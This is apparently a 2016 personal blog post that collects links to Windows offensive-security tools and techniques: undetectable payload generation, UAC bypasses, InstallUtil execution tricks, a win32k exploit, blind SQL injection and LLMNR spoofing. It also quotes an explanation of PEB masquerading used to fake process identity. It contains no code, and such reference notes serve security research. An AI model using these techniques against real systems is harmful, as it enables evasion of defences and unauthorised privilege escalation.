Tuesday, September 13, 2016

Useful links:

Rot13 in Windows:
https://blog.didierstevens.com/2006/07/24/rot13-is-used-in-windows-you%E2%80%99re-joking/

UserAssist - thing, which stores in registry (in Rot13) what did you run on your PC. And useful util for viewing:
https://blog.didierstevens.com/programs/userassist/

Undetectable windows payload generation (metasploit generates shellcode, then python code generated, who executed this shellcode, then it's aes encrypted & pack to the mzpe):
https://github.com/nccgroup/Winpayloads
(description of UAC bypass used by link (again IFileOperation) - https://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html)

Masquerade-PEB powershell script (for UAC bypass):
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Masquerade-PEB.ps1
with interesting idea:

one more UAC bypass:
https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC

Masquerade-PEB uses NtQueryInformationProcess to get a handle to powershell's
PEB. From there itreplaces a number of UNICODE_STRING structs in memory to
give powershell the appearance of a different process. Specifically, the
function will overwrite powershell's "ImagePathName" & "CommandLine" in
_RTL_USER_PROCESS_PARAMETERS and the "FullDllName" & "BaseDllName" in the
_LDR_DATA_TABLE_ENTRY linked list.

This can be useful as it would fool any Windows work-flows which rely solely
on the Process Status API to check process identity. A practical example would
be the IFileOperation COM Object which can perform an elevated file copy if it
thinks powershell is really explorer.exe ;)!

Interesting case, how to run stuff in context of InstallUtil.exe from win dir! It can be god damn autorun, for example:
http://www.blackhillsinfosec.com/?p=4881

How to run console program with parameters, when cmd.exe disabled:
http://www.blackhillsinfosec.com/?p=5257

some interesting tool:
https://github.com/goldshtn/etrace

CVE-2016-3308 - corrupt heap in win32k
https://github.com/55-AA/CVE-2016-3308

blind sql framework
http://www.darknet.org.uk/2016/09/bbqsql-blind-sql-injection-framework/

LLMNR/NBNS spoofer:
https://github.com/Kevin-Robertson/Inveigh


Posted by at 1 comment:
Labels: , , , , ,
Subscribe to: Posts (Atom)